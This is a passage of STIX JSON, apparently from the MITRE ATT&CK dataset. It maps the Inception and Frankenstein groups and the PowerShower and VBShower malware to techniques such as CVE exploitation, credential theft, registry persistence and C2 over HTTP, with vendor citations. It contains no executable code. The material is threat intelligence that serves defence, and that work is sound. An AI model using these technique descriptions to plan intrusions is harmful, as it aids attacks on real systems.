+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) lured victims into clicking malicious files for machine reconnaissance and to execute malware.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6ee38990-50e9-423d-aea8-c3c16cf98ca4",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.919Z",
+ "created": "2020-05-08T18:41:16.433Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ad3298b6-8cb5-4c4e-b2be-e058273c15be",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.441Z",
+ "created": "2020-05-08T18:41:16.441Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--7fcb628d-ce4d-48a4-bb9f-b727fe54e6af",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.914Z",
+ "created": "2020-05-08T18:41:16.445Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b0702a30-f680-4f9b-99c3-352ce2a9557a",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.912Z",
+ "created": "2020-05-08T18:41:16.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a file listing plugin to collect information about file and directories both on local and remote drives.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--40e6721c-f5fd-4c51-aec9-93b70e7e312c",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.457Z",
+ "created": "2020-05-08T18:41:16.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--01323439-5287-43cd-b7d9-750e606db602",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.196Z",
+ "created": "2020-05-08T18:41:16.460Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used decoy documents to load malicious remote payloads via HTTP.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c597beea-3bcd-45ee-a400-5b615f9ae621",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.952Z",
+ "created": "2020-05-08T18:56:22.967Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used VBScript to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--c4c1e4e6-5662-42cd-86e1-fa7b3c82f84c",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.004Z",
+ "created": "2020-05-08T18:56:22.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used PowerShell to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--5b2457a6-a2b8-4809-a2a0-68d1c74bbb9b",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.006Z",
+ "created": "2020-05-08T18:56:22.995Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--47747638-0f8d-4735-b16d-b52861dec73f",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.164Z",
+ "created": "2020-05-08T19:27:12.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f5f463d9-d604-406e-89f3-dbf26ef74a69",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.159Z",
+ "created": "2020-05-08T19:27:12.526Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a3bdd37c-f82c-4df3-94f8-63495466565c",
+ "type": "relationship",
+ "modified": "2020-05-20T20:43:50.155Z",
+ "created": "2020-05-08T19:27:12.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--175199ba-b8b8-467b-9010-a2f549abd957",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.161Z",
+ "created": "2020-05-08T19:27:12.538Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a679be02-156a-4e02-bfa5-ce07b60d147b",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.163Z",
+ "created": "2020-05-08T19:27:12.540Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--79bae99a-8480-4857-834b-fa823adca4c6",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.209Z",
+ "created": "2020-05-08T19:27:12.568Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--86079dc0-0c46-4068-a2f1-9422d81a03be",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.243Z",
+ "created": "2020-05-08T20:02:19.072Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--69ab51f8-fce5-436e-86a9-5d33d2332439",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.211Z",
+ "created": "2020-05-08T20:02:19.640Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aaf0545f-bb47-4796-b23e-4780f354add9",
+ "type": "relationship",
+ "modified": "2020-05-12T20:35:30.002Z",
+ "created": "2020-05-08T20:17:55.366Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c737cde1-271e-4f00-9692-3784e075c24d",
+ "type": "relationship",
+ "modified": "2020-05-08T20:17:55.397Z",
+ "created": "2020-05-08T20:17:55.396Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe3b8cb8-8ff1-4abf-ac98-ce31108e5bb5",
+ "type": "relationship",
+ "modified": "2020-05-12T12:46:57.152Z",
+ "created": "2020-05-08T20:55:28.723Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c1cf1113-db4a-406a-8178-32fa4311d5dc",
+ "type": "relationship",
+ "modified": "2020-05-08T20:55:28.740Z",
+ "created": "2020-05-08T20:55:28.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) used HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8} to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cf55e84-53d2-4ec9-aaed-1df38ea08af1",
+ "type": "relationship",
+ "modified": "2020-05-12T20:56:07.282Z",
+ "created": "2020-05-08T20:55:28.743Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has attempted to complicate forensic analysis by deleting all the files contained in %APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word and %APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--83384e31-d9c6-46a0-956f-ee28d7d0cb89",
+ "type": "relationship",
+ "modified": "2020-05-08T20:55:28.749Z",
+ "created": "2020-05-08T20:55:28.749Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "relationship_type": "uses",
+ "id": "relationship--9b049c1e-0074-460e-86d3-338a33727172",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Kaspersky Cloud Atlas August 2019)",
+ "type": "relationship",
+ "modified": "2020-05-08T20:58:45.034Z",
+ "created": "2020-05-08T20:57:03.988Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) has used spearphishing emails to send trojanized Microsoft Word documents.(Citation: Talos Frankenstein June 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--996847c0-9e6f-44e5-bed7-ee78af9cf17d",
+ "type": "relationship",
+ "modified": "2020-05-28T00:01:09.507Z",
+ "created": "2020-05-11T15:21:09.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
